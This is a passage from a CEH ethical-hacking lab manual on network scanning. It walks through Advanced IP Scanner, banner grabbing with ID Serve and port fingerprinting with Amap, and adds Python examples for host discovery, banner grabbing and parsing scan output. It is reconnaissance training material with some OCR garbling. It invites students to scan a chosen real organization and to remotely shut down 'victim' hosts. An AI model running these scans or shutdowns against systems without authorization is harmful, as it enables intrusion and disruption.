
CEH Lab Manual

Scanning Networks

Module 03
Module 03 - Scanning Networks

Scanning a Target Network
Scanning a network refers to a set of procedures for identifying hosts, ports, and
services running in a network.

L a b S c e n a r io

I CON KEY Vulnerability scanning determines the possibility of network security attacks. It
evaluates the organization’s systems and network for vulnerabilities such as missing
Valuable
information patches, unnecessary services, weak authentication, and weak encryption.
Vulnerability scanning is a critical component of any penetration testing assignment.
s Test your
You need to conduct penetration testing and list die direats and vulnerabilities
knowledge
found in an organization’s network and perform port s c a n n in g , n e tw o rk s c a n n in g ,
H Web exercise and v u ln e ra b ility s c a n n in g ro identify IP/hostname, live hosts, and vulnerabilities.
Q Workbook review
Lab Objectives

The objective of this lab is to help students in conducting network scanning,
analyzing the network vulnerabilities, and maintaining a secure network.
You need to perform a network scan to:
■ Check live systems and open ports
■ Perform banner grabbing and OS fingerprinting
■ Identify network vulnerabilities
■ Draw network diagrams of vulnerable hosts

Lab Environment

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03
Scanning Networks.

In the lab, you need:
■ A computer running with Windows Server 2012, Windows Server 2008,
Windows 8 or Windows 7 with Internet access
■ A web browser
■ Administrative privileges to run tools and perform scans

Lab Duration

Time: 50 Minutes

Overview of Scanning Networks

Building on what we learned from our information gathering and threat modeling,
we can now begin to actively query our victims for vulnerabilities that may lead to a
compromise. We have narrowed down our attack surface considerably since we first
began the penetration test with everything potentially in scope.

CEH Lab Manual Page 85 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.

Note that not all vulnerabilities will result in a system compromise. When searching
for known vulnerabilities you will find more issues that disclose sensitive
information or cause a denial of service condition than vulnerabilities that lead to
remote code execution. These may still turn out to be very interesting on a
penetration test. In fact even a seemingly harmless misconfiguration can be the
turning point in a penetration test that gives up the keys to the kingdom.
For example, consider FTP anonymous read access. This is a fairly normal setting.
Though FTP is an insecure protocol and we should generally steer our clients
towards using more secure options like SFTP, using FTP with anonymous read
access does not by itself lead to a compromise. If you encounter an FTP server that
allows anonymous read access, but read access is restricted to an FTP directory that
does not contain any files that would be interesting to an attacker, then the risk
associated with the anonymous read option is minimal. On the other hand, if you
are able to read the entire file system using the anonymous FTP account, or possibly
even worse, someone has mistakenly left the customer's trade secrets in the FTP
directory that is readable to the anonymous user; this configuration is a critical issue.
Vulnerability scanners do have their uses in a penetration test, and it is certainly
useful to know your way around a few of them. As we will see in this module, using
a vulnerability scanner can help a penetration tester quickly gain a good deal of
potentially interesting information about an environment.
In this module we will look at several forms of vulnerability assessment. We will
study some commonly used scanning tools.

Lab Tasks

TASK 1
Pick an organization that you feel is worthy of your attention. This could be an
educational institution, a commercial company, or perhaps a nonprofit charity.

Overview

Ensure you have ready a copy of the additional readings handed out for this lab.

Recommended labs to assist you in scanning networks:
■ Scanning System and Network Resources Using Advanced IP Scanner
■ Banner Grabbing to Determine a Remote Target System Using ID Serve
■ Fingerprint Open Ports for Running Applications Using the Amap Tool
■ Monitor TCP/IP Connections Using the CurrPorts Tool
■ Scan a Network for Vulnerabilities Using GFI LanGuard 2012
■ Explore and Audit a Network Using Nmap
■ Scanning a Network Using the NetScanTools Pro
■ Drawing Network Diagrams Using LANSurveyor
■ Mapping a Network Using the Friendly Pinger
■ Scanning a Network Using the Nessus Tool
■ Auditing Scanning by Using Global Network Inventory
■ Anonymous Browsing Using Proxy Switcher
■ Daisy Chaining Using Proxy Workbench
■ HTTP Tunneling Using HTTPort
■ Basic Network Troubleshooting Using the MegaPing
■ Detect, Delete and Block Google Cookies Using G-Zapper
■ Scanning the Network Using the Colasoft Packet Builder
■ Scanning Devices in a Network Using The Dude

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on
your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB.

Scanning System and Network Resources Using Advanced IP Scanner

Advanced IP Scanner is a free network scanner that gives you various types of
information regarding local network computers.

Lab Scenario

In this day and age, where attackers are able to wait for a single chance to attack an
organization to disable it, it becomes very important to perform vulnerability
scanning to find the flaws and vulnerabilities in a network and patch them before an
attacker intrudes into the network. The goal of running a vulnerability scanner is to
identify devices on your network that are open to known vulnerabilities.

Lab Objectives

The objective of this lab is to help students perform a local network scan and
discover all the resources on the network.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03
Scanning Networks.

You need to:
■ Perform a system and network scan
■ Enumerate user accounts
■ Execute remote penetration
■ Gather information about local network computers

Lab Environment

In the lab, you need:
■ Advanced IP Scanner located at Z:\CEHv8 Module 03 Scanning
Networks\Scanning Tools\Advanced IP Scanner
■ You can also download the latest version of Advanced IP Scanner
from the link http://www.advanced-ip-scanner.com

■ If you decide to download the latest version, then screenshots shown
in the lab might differ
■ A computer running Windows 8 as the attacker (host machine)
■ Another computer running Windows Server 2008 as the victim (virtual
machine)
■ A web browser with Internet access
■ Double-click ipscan20.msi and follow the wizard-driven installation steps
to install Advanced IP Scanner
■ Administrative privileges to run this tool

Advanced IP Scanner works on Windows Server 2003/Server 2008 and on
Windows 7 (32 bit, 64 bit).

Lab Duration

Time: 20 Minutes

Overview of Network Scanning

Network scanning is performed to collect information about live systems, open
ports, and network vulnerabilities. Gathered information is helpful in determining
threats and vulnerabilities in a network and to know whether there are any
suspicious or unauthorized IP connections, which may enable data theft and cause
damage to resources.
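How a scanner turns a Select range entry into the Results tab, as an added example that is not part of the manual or of Advanced IP Scanner's own code: it expands the first-last range syntax (and, going beyond the manual, a CIDR block), fills the Manufacturer column by looking each replying host's MAC up in an OUI table, and produces the alive/dead summary. The OUI table and the reply table are constructed for the example from the values shown in Figure 1.6; a real scanner fills the reply table from its own ARP and ping probes.

```python
import ipaddress

# Constructed OUI table (first three MAC bytes -> vendor), filled in from the
# Manufacturer column of the lab's scan result. A real scanner ships the full
# IEEE OUI registry; this subset is an assumption for the example.
OUI_VENDORS = {
    "00:09:5B": "Netgear, Inc.",
    "D0:67:E5": "Dell Inc",
    "00:15:5D": "Microsoft Corporation",
    "D4:BE:D9": "Dell Inc",
}

# Constructed stand-in for the scanner's probe results: IP -> (name, MAC).
# The values mirror Figure 1.6; hosts that did not answer are simply absent.
SAMPLE_REPLIES = {
    "10.0.0.1": ("10.0.0.1", "00:09:5B:AE:24:CC"),
    "10.0.0.2": ("WIN-MSSELCK4K41", "D0:67:E5:1A:16:36"),
    "10.0.0.3": ("WINDOWS8", "00:15:5D:A8:6E:C6"),
    "10.0.0.5": ("WIN-LXQN3WR3R9M", "00:15:5D:A8:6E:03"),
    "10.0.0.7": ("WIN-D39MR5HL9E4", "D4:BE:D9:C3:CE:2D"),
}


def expand_range(spec: str) -> list[str]:
    """Expand a 'first-last' range (the Select range syntax) or a CIDR block
    into the individual addresses to probe."""
    if "-" in spec:
        first, last = (ipaddress.ip_address(p.strip()) for p in spec.split("-", 1))
        if last < first:
            raise ValueError(f"range end {last} precedes start {first}")
        return [str(first + i) for i in range(int(last) - int(first) + 1)]
    # CIDR form: hosts() skips the network and broadcast addresses
    return [str(h) for h in ipaddress.ip_network(spec, strict=False).hosts()]


def vendor_for(mac: str) -> str:
    """Map a MAC to its vendor by OUI; an unknown OUI is reported, not guessed."""
    oui = mac.upper().replace("-", ":")[:8]
    return OUI_VENDORS.get(oui, "unknown")


def build_inventory(range_spec: str, replies: dict) -> list[dict]:
    """One row per probed address, like the scanner's Results tab."""
    rows = []
    for ip in expand_range(range_spec):
        name, mac = replies.get(ip, ("", ""))
        rows.append({
            "ip": ip,
            "status": "alive" if ip in replies else "dead",
            "name": name,
            "mac": mac,
            "vendor": vendor_for(mac) if mac else "",
        })
    return rows


def summarize(rows: list[dict]) -> str:
    """The status-bar line: how many addresses answered and how many did not."""
    alive = sum(r["status"] == "alive" for r in rows)
    return f"{alive} alive, {len(rows) - alive} dead"


if __name__ == "__main__":
    inventory = build_inventory("10.0.0.1-10.0.0.10", SAMPLE_REPLIES)
    for r in inventory:
        print(f"{r['status']:<6} {r['ip']:<10} {r['name']:<16} {r['mac']:<18} {r['vendor']}")
    print(summarize(inventory))
```

The summary here only distinguishes answered from not answered; the scanner's own status bar additionally reports an "unknown" count, which is its own classification and is not reproduced.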

Lab Tasks

TASK 1: Launching Advanced IP Scanner

1. Go to Start by hovering the mouse cursor in the lower-left corner of the
desktop.

FIGURE 1.1: Windows 8 - Desktop view

2. Click Advanced IP Scanner from the Start menu in the attacker machine
(Windows 8).

With Advanced IP Scanner, you can scan hundreds of IP addresses
simultaneously.

FIGURE 1.2: Windows 8 - Apps


3. The Advanced IP Scanner main window appears.

You can wake any machine remotely with Advanced IP Scanner, if the
Wake-on-LAN feature is supported by your network card.

FIGURE 1.3: The Advanced IP Scanner main window

4. Now launch the Windows Server 2008 virtual machine (victim's machine).

You have to guess a range of IP addresses of the victim machine.

FIGURE 1.4: The victim machine Windows Server 2008

5. Now, switch back to the attacker machine (Windows 8) and enter an IP
address range in the Select range field.
6. Click the Scan button to start the scan.

Radmin 2.x and 3.x integration enables you to connect (if Radmin is
installed) to remote computers with just one click.

The status of the scan is shown at the bottom left side of the window.

7. Advanced IP Scanner scans all the IP addresses within the range and
displays the scan results after completion.

Lists of computers saving and loading enable you to perform operations
with a specific list of computers. Just save a list of machines you need and
Advanced IP Scanner loads it at startup automatically.

Group Operations: any feature of Advanced IP Scanner can be used with
any number of selected computers. For example, you can remotely shut
down a complete computer class with a few clicks.

FIGURE 1.6: The Advanced IP Scanner main window after scanning
(range 10.0.0.1-10.0.0.10, Results tab)

Status  Name             IP        Manufacturer           MAC address
alive   10.0.0.1         10.0.0.1  Netgear, Inc.          00:09:5B:AE:24:CC
alive   WIN-MSSELCK4K41  10.0.0.2  Dell Inc               D0:67:E5:1A:16:36
alive   WINDOWS8         10.0.0.3  Microsoft Corporation  00:15:5D:A8:6E:C6
alive   WIN-LXQN3WR3R9M  10.0.0.5  Microsoft Corporation  00:15:5D:A8:6E:03
alive   WIN-D39MR5HL9E4  10.0.0.7  Dell Inc               D4:BE:D9:C3:CE:2D
5 alive, 0 dead, 5 unknown

8. You can see in the above figure that Advanced IP Scanner has detected
the victim machine's IP address and displays the status as alive.
9. Right-click any of the detected IP addresses. It will list Wake-On-LAN, Shut
down, and Abort Shut down.

TASK 2: Extract Victim's IP Address Info

Wake-on-LAN: you can wake any machine remotely with Advanced IP Scanner,
if the Wake-on-LAN feature is supported by your network card.

FIGURE 1.7: The Advanced IP Scanner main window with Alive Host list
(right-click menu on a detected host: Copy, Add to 'Favorites', Rescan selected,
Save selected..., Wake-On-LAN, Shut down..., Abort shut down, Radmin)

10. The list displays properties of the detected computer, such as IP
address, Name, MAC, and NetBIOS information.
11. You can forcefully Shutdown, Reboot, and Abort Shutdown the
selected victim machine/IP address.

FIGURE 1.8: The Advanced IP Scanner Computer properties window
(Shutdown options: Use Windows authentication, User name, Password,
Timeout (sec): 60, Message, Forced shutdown, Reboot)

Winfingerprint Input Options: IP Range (Netmask and Inverted Netmask
supported), IP List, Single Host, Neighborhood.

12. Now you have the IP address, Name, and other details of the victim
machine.
13. You can also try Angry IP Scanner located at D:\CEH-Tools\CEHv8
Module 03 Scanning Networks\Ping Sweep Tools\Angry IP Scanner. It
also scans the network for machines and ports.

Lab Analysis

Document all the IP addresses, open ports and their running applications, and
protocols discovered during the lab.

Tool/Utility: Advanced IP Scanner
Information Collected/Objectives Achieved:
Scan Information:
■ IP address
■ System name
■ MAC address
■ NetBIOS information
■ Manufacturer
■ System status

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB.

Questions

1. Examine and evaluate the IP addresses and range of IP addresses.

Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs

Banner Grabbing to Determine a Remote Target System Using ID Serve

ID Serve is used to identify the make, model, and version of any website's server
software.

Lab Scenario

In the previous lab, you learned to use Advanced IP Scanner. This tool can also be
used by an attacker to detect vulnerabilities such as buffer overflow, integer overflow,
SQL injection, and web application on a network. If these vulnerabilities are not
fixed immediately, attackers can easily exploit them and crack into the network and
cause server damage.

Therefore, it is extremely important for penetration testers to be familiar with
banner grabbing techniques to monitor servers to ensure compliance and
appropriate security updates. Using this technique you can also locate rogue servers
or determine the role of servers within a network. In this lab, you will learn the
banner grabbing technique to determine a remote target system using ID Serve.

Lab Objectives

The objective of this lab is to help students learn to banner grab the website and
discover applications running on this website.
In this lab you will learn to:
■ Identify the domain IP address
■ Identify the domain information

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03
Scanning Networks.

Lab Environment

To perform the lab you need:
■ ID Serve is located at D:\CEH-Tools\CEHv8 Module 03 Scanning
Networks\Banner Grabbing Tools\ID Serve
■ You can also download the latest version of ID Serve from the link
http://www.grc.com/id/idserve.htm
■ If you decide to download the latest version, then screenshots shown
in the lab might differ
■ Double-click idserve to run ID Serve
■ Administrative privileges to run the ID Serve tool
■ Run this tool on Windows Server 2012

Lab Duration

Time: 5 Minutes

Overview of ID Serve

ID Serve can connect to any server port on any domain or IP address, then pull
and display the server's greeting message, if any, often identifying the server's make,
model, and version, whether it's for FTP, SMTP, POP, NEWS, or anything else.

Lab Tasks

TASK 1: Identify website server information

1. Double-click idserve located at D:\CEH-Tools\CEHv8 Module 03 Scanning
Networks\Banner Grabbing Tools\ID Serve.
2. In the main window of ID Serve shown in the following figure, select the
Server Query tab.

FIGURE 2.1: Main window of ID Serve (Internet Server Identification Utility,
v1.02; tabs: Background, Server Query, Q&A/Help; input field: "Enter or copy /
paste an Internet server URL or IP address here"; button: Query The Server)

If an IP address is entered instead of a URL, ID Serve will attempt to
determine the domain name associated with the IP.

3. Enter the IP address or URL address in Enter or Copy/paste an Internet
server URL or IP address here:

FIGURE 2.2: Entering the URL for query (www.certifiedhacker.com)

ID Serve can accept the URL or IP as a command-line parameter.

4. Click Query The Server; it shows server query processed information.

ID Serve can also connect with non-web servers to receive and report that
server's greeting message. This generally reveals the server's make, model,
version, and other potentially useful information.

FIGURE 2.3: Server processed information

Server query processing:
Initiating server query
Looking up IP address for domain www.certifiedhacker.com
The IP address for the domain is 202.75.54.101
Connecting to the server on standard HTTP port: 80
Connected! Requesting the server's default page

The server identified itself as: Microsoft-IIS/6.0

Lab Analysis

Document all the IP addresses, their running applications, and the protocols you
discovered during the lab.

Tool/Utility: ID Serve
Information Collected/Objectives Achieved:
IP address: 202.75.54.101
Server Connection: Standard HTTP port: 80
Response headers returned from server:
■ HTTP/1.1 200
■ Server: Microsoft-IIS/6.0
■ X-Powered-By: PHP/4.4.8
■ Transfer-Encoding: chunked
■ Content-Type: text/html
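The exchange ID Serve performs on the Server Query tab, as an added example that is neither the manual's nor Gibson Research's code: connect to the HTTP port, send a minimal request, read back the reply headers, and pick out the ones that name the server software. The reply is the header set from the Lab Analysis table above, retyped as a raw HTTP response (the "OK" reason phrase and the blank-line terminator are assumptions) and served from a loopback listener so the example runs offline. The version_disclosures check is the defender's view of the same data: each header it returns tells any visitor exactly which product release is running.

```python
import socket
import threading

# Constructed sample: the response headers the lab's ID Serve run reported for
# www.certifiedhacker.com, retyped as a raw HTTP reply (reason phrase and
# terminator assumed) so a local listener can replay it.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"X-Powered-By: PHP/4.4.8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

# Headers that name the server software; these are what a banner grab collects.
IDENTIFYING_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "via")


def parse_banner(raw: bytes) -> dict:
    """Split a raw HTTP reply into its status line and the identifying headers."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("latin-1").split("\r\n")
    banner = {"status": lines[0]}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() in IDENTIFYING_HEADERS:
            banner[name.strip().lower()] = value.strip()
    return banner


def version_disclosures(banner: dict) -> list[str]:
    """Headers whose value carries a product/version pair (a '/' plus digits)."""
    return [h for h, v in banner.items()
            if h != "status" and "/" in v and any(c.isdigit() for c in v)]


def grab_banner(host: str, port: int = 80, timeout: float = 5.0) -> dict:
    """Connect, send a minimal HEAD request, read the reply headers, parse them."""
    request = f"HEAD / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while b"\r\n\r\n" not in buf:
            data = sock.recv(4096)
            if not data:        # peer closed before finishing the headers
                break
            buf += data
    return parse_banner(buf)


def _replay_once(listener: socket.socket, reply: bytes) -> None:
    """Stand-in for the remote server: answer one connection with a canned reply."""
    conn, _ = listener.accept()
    with conn:
        conn.recv(4096)         # consume the request; the reply does not depend on it
        conn.sendall(reply)


def demo() -> dict:
    """Run the exchange end to end against a loopback listener."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))        # port 0: the OS picks a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    server = threading.Thread(target=_replay_once, args=(listener, SAMPLE_RESPONSE), daemon=True)
    server.start()
    try:
        return grab_banner("127.0.0.1", port)
    finally:
        server.join(timeout=2)
        listener.close()


if __name__ == "__main__":
    result = demo()
    print(result)
    print("version-disclosing headers:", version_disclosures(result))
```

A HEAD request is used rather than GET so that only headers come back; ID Serve requests the default page, which yields the same header set plus a body that is not needed for identification.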

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB.

Questions

1. Examine what protocols ID Serve apprehends.
2. Check if ID Serve supports https (SSL) connections.

Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs

Fingerprinting Open Ports Using the Amap Tool

Amap determines applications running on each open port.

Lab Scenario

Computers communicate with each other by knowing the IP address in use, and
ports determine which program receives the data. A complete data transfer
always contains the IP address plus the port number required. In the previous lab
we found out that the server connection is using a Standard HTTP port 80. If an
attacker finds this information, he or she will be able to use the open ports for
attacking the machine.
In this lab, you will learn to use the Amap tool to perform port scanning and know
exactly what applications are running on each port found open.

Lab Objectives

The objective of this lab is to help students learn to fingerprint open ports and
discover applications running on these open ports.
In this lab, you will learn to:
■ Identify the application protocols running on open port 80
■ Detect application protocols

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03
Scanning Networks.

Lab Environment

To perform the lab you need:
■ Amap is located at D:\CEH-Tools\CEHv8 Module 03 Scanning
Networks\Banner Grabbing Tools\AMAP
■ You can also download the latest version of AMAP from the link
http://www.thc.org/thc-amap
■ If you decide to download the latest version, then screenshots shown
in the lab might differ

■ A computer running Web Services enabled for port 80
■ Administrative privileges to run the Amap tool
■ Run this tool on Windows Server 2012

Lab Duration

Time: 5 Minutes

Overview of Fingerprinting

Fingerprinting is used to discover the applications running on each open port found
on the network. Fingerprinting is achieved by sending trigger packets and looking
up the responses in a list of response strings.
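How trigger packets and response-string lookup fit together, as an added example that is neither the manual's nor amap's code: a small signature list (these patterns are this example's own assumptions, not amap's appdefs.resp entries), a probe routine that tries each trigger and collects whatever the service sends back, and an offline run over constructed responses. As in amap, every definition that matches is reported, so an IIS reply lists both http-iis and http, and a port that never answers ends up in the unidentified list exactly as the tool reports it.

```python
import re
import socket
from typing import Optional

# Constructed signature list: (protocol name, pattern tried against the bytes
# a service sends back). An assumption for this example, not amap's own table;
# as in amap, several definitions may match one response.
SIGNATURES = [
    ("http-iis",      re.compile(rb"^HTTP/1\.[01] \d{3}.*?\r\nServer: Microsoft-IIS/", re.S)),
    ("http-apache-2", re.compile(rb"^HTTP/1\.[01] \d{3}.*?\r\nServer: Apache/2\.", re.S)),
    ("http",          re.compile(rb"^HTTP/1\.[01] \d{3}")),
    ("ssh",           re.compile(rb"^SSH-\d\.\d-")),
    ("ftp",           re.compile(rb"^220[ -].*FTP", re.I)),
    ("smtp",          re.compile(rb"^220[ -].*E?SMTP", re.I)),
]

# Trigger packets. SSH, FTP and SMTP speak first, so an empty trigger (connect
# and just read) is tried before the HTTP request, which only HTTP answers.
TRIGGERS = [b"", b"GET / HTTP/1.0\r\n\r\n"]


def identify(response: Optional[bytes]) -> list[str]:
    """All signature names the response matches. None or empty bytes (no
    connection, or nothing received) yields [], which the report treats as
    unidentified."""
    if not response:
        return []
    return [name for name, pattern in SIGNATURES if pattern.search(response)]


def probe(host: str, port: int, timeout: float = 3.0) -> Optional[bytes]:
    """Collect a response using the trigger packets in order. Returns None
    when the port is unreachable or stays silent for every trigger."""
    for trigger in TRIGGERS:
        try:
            sock = socket.create_connection((host, port), timeout=timeout)
        except OSError:
            return None            # refused, reset or unreachable: nothing to fingerprint
        with sock:
            try:
                if trigger:
                    sock.sendall(trigger)
                data = sock.recv(2048)
            except OSError:        # timed out or reset while waiting: try the next trigger
                continue
        if data:
            return data
    return None


# Constructed responses standing in for what probe() would collect, so the
# example runs offline. Port 75 is the unreachable case from the lab's run.
SAMPLE_RESPONSES = {
    "10.0.0.4:80/tcp": b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\nContent-Type: text/html\r\n\r\n",
    "10.0.0.4:22/tcp": b"SSH-2.0-OpenSSH_5.3\r\n",
    "10.0.0.4:25/tcp": b"220 mail.example.test ESMTP ready\r\n",
    "10.0.0.4:75/tcp": None,
}


def fingerprint(responses: dict) -> tuple[dict, list]:
    """Split collected responses into identified (port -> names) and
    unidentified ports, the two sections of an amap report."""
    identified, unidentified = {}, []
    for port, resp in responses.items():
        names = identify(resp)
        if names:
            identified[port] = names
        else:
            unidentified.append(port)
    return identified, unidentified


if __name__ == "__main__":
    ident, unident = fingerprint(SAMPLE_RESPONSES)
    for port, names in ident.items():
        for name in names:
            print(f"Protocol on {port} matches {name}")
    print("Unidentified ports:", " ".join(unident), f"(total {len(unident)}).")
```

Bytes that match nothing (a TLS handshake, a binary protocol) also land in the unidentified list; that is the case to follow up on by hand, since something is listening there but the signature table does not know it.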

Lab Tasks

TASK 1: Identify Application Protocols Running on Port 80

1. Open the command prompt and navigate to the Amap directory. In this lab
the Amap directory is located at D:\CEH-Tools\CEHv8 Module 03 Scanning
Networks\Banner Grabbing Tools\AMAP.
2. Type amap www.certifiedhacker.com 80, and press Enter.

Administrator: Command Prompt
D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>amap www.certifiedhacker.com 80
amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:20:42 - MAPPING mode

Unidentified ports: 202.75.54.101:80/tcp (total 1).

amap v5.2 finished at 2012-08-28 12:20:53
D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>

Syntax: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec]
[-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

FIGURE 3.1: Amap with hostname www.certifiedhacker.com with Port 80

3. You can see the specific application protocols running on the entered host
name and the port 80.
4. Use the IP address to check the applications running on a particular port.
5. In the command prompt, type the IP address of your local Windows Server
2008 (virtual machine) amap 10.0.0.4 75-81 (local Windows Server 2008)
and press Enter (the IP address will be different in your network).
6. Try scanning different websites using different ranges of switches like amap
www.certifiedhacker.com 1-200

For Amap options, type amap -help.

Compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows,
ARM-Linux and PalmOS.

D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>amap 10.0.0.4 75-81
amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:27:51 - MAPPING mode
Protocol on 10.0.0.4:80/tcp matches http
Protocol on 10.0.0.4:80/tcp matches http-apache-2
Warning: Could not connect (unreachable) to 10.0.0.4:76/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:75/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:77/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:78/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:79/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:81/tcp, disabling port (EUNKN)
Protocol on 10.0.0.4:80/tcp matches http-iis
Protocol on 10.0.0.4:80/tcp matches webmin
Unidentified ports: 10.0.0.4:75/tcp 10.0.0.4:76/tcp 10.0.0.4:77/tcp 10.0.0.4:78/tcp 10.0.0.4:79/tcp 10.0.0.4:81/tcp (total 6).
amap v5.2 finished at 2012-08-28 12:27:54
D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>

FIGURE 3.2: Amap with IP address and with range of switches 75-81
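A parser for the console output shown in Figure 3.2, as an added example that is not part of the manual or of amap: it collects the "Protocol on ... matches" lines per port, the ports amap could not connect to, and the final unidentified list, then produces the rows for the Lab Analysis table. The sample is the lab's own run retyped from the figure (the bracket characters around "unreachable" and "EUNKN" are reconstructed from the scan of the page). The silent_but_open check is the follow-up a defender wants: a port that accepted a connection but matched no signature is something listening that the tool could not name.

```python
import re

# Constructed sample: the amap v5.2 output of the lab's run against 10.0.0.4,
# ports 75-81, retyped from Figure 3.2 (bracket characters reconstructed).
SAMPLE_OUTPUT = """\
amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:27:51 - MAPPING mode
Protocol on 10.0.0.4:80/tcp matches http
Protocol on 10.0.0.4:80/tcp matches http-apache-2
Warning: Could not connect (unreachable) to 10.0.0.4:76/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:75/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:77/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:78/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:79/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:81/tcp, disabling port (EUNKN)
Protocol on 10.0.0.4:80/tcp matches http-iis
Protocol on 10.0.0.4:80/tcp matches webmin
Unidentified ports: 10.0.0.4:75/tcp 10.0.0.4:76/tcp 10.0.0.4:77/tcp 10.0.0.4:78/tcp 10.0.0.4:79/tcp 10.0.0.4:81/tcp (total 6).
amap v5.2 finished at 2012-08-28 12:27:54
"""

MATCH_RE = re.compile(r"^Protocol on (\S+) matches (\S+)$")
UNREACH_RE = re.compile(r"^Warning: Could not connect \(unreachable\) to (\S+), disabling port")
UNIDENT_RE = re.compile(r"^Unidentified ports: (.*?) \(total (\d+)\)\.$")


def parse_amap(text: str) -> dict:
    """Turn amap's MAPPING-mode output into a report: protocols matched per
    port, ports that never accepted a connection, and the unidentified list."""
    report = {"identified": {}, "unreachable": [], "unidentified": []}
    for raw in text.splitlines():
        line = raw.strip()
        if m := MATCH_RE.match(line):
            report["identified"].setdefault(m.group(1), []).append(m.group(2))
        elif m := UNREACH_RE.match(line):
            report["unreachable"].append(m.group(1))
        elif m := UNIDENT_RE.match(line):
            ports = m.group(1).split()
            if len(ports) != int(m.group(2)):
                raise ValueError("unidentified list does not match its (total N) count")
            report["unidentified"] = ports
    return report


def silent_but_open(report: dict) -> list[str]:
    """Unidentified ports that were NOT unreachable: amap connected but could
    not name the service, so something is listening that needs a manual look."""
    return sorted(set(report["unidentified"]) - set(report["unreachable"]))


def lab_analysis_rows(report: dict) -> list[str]:
    """The lines for the lab's Information Collected table."""
    rows = [f"Identified open port: {port}: " + ", ".join(names)
            for port, names in sorted(report["identified"].items())]
    rows += [f"Unidentified port: {p}" for p in report["unidentified"]]
    return rows


if __name__ == "__main__":
    rep = parse_amap(SAMPLE_OUTPUT)
    print("\n".join(lab_analysis_rows(rep)))
    print("open but unnamed:", silent_but_open(rep) or "none")
```

In the lab's run every unidentified port was also unreachable, so silent_but_open returns nothing; the test below adds an extra reachable-but-unnamed port to show the case that would be flagged.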

Lab Analysis

Document all the IP addresses, open ports and their running applications, and the
protocols you discovered during the lab.

Tool/Utility: Amap
Information Collected/Objectives Achieved:
Identified open port: 80
Web Servers:
■ http-apache-2
■ http-iis
■ webmin
Unidentified ports:
■ 10.0.0.4:75/tcp
■ 10.0.0.4:76/tcp
■ 10.0.0.4:77/tcp
■ 10.0.0.4:78/tcp
■ 10.0.0.4:79/tcp
■ 10.0.0.4:81/tcp

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB.

Questions

1. Execute the Amap command for a host name with a port number other
than 80.
2. Analyze how the Amap utility gets the applications running on different
machines.
3. Use various Amap options and analyze the results.

Internet Connection Required
☑ Yes ☐ No
Platform Supported
☑ Classroom ☐ iLabs

M o n ito r in g T C P /IP C o n n e c t i o n s
U s in g t h e C u r r P o r ts T o o l
C u n P o r ts is n e tw o rk m o n ito rin g s o fh ia re th a t d is p la y s th e lis t o f a ll c u r re n tly

o p e n e d T C P / IP a n d U D P p o r ts o n y o u r lo c a l c o m p u te r.

Lab Scenario
In the previous lab you learned how to check for open ports using the Amap tool. As an ethical hacker and penetration tester, you must be able to block such attacks by using appropriate firewalls or disable unnecessary services running on the computer.
You already know that the Internet uses a software protocol named TCP/IP to format and transfer data. An attacker can monitor ongoing TCP connections and can have all the information in the IP and TCP headers and the packet payloads with which he or she can hijack the connection. As the attacker has all the information on the network, he or she can create false packets in the TCP connection.
As a network administrator, your daily task is to check the TCP/IP connections of each server you manage. You have to monitor all TCP and UDP ports and list all the established IP addresses of the server using the CurrPorts tool.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Objectives
The objective of this lab is to help students determine and list all the TCP/IP and UDP ports of a local computer.
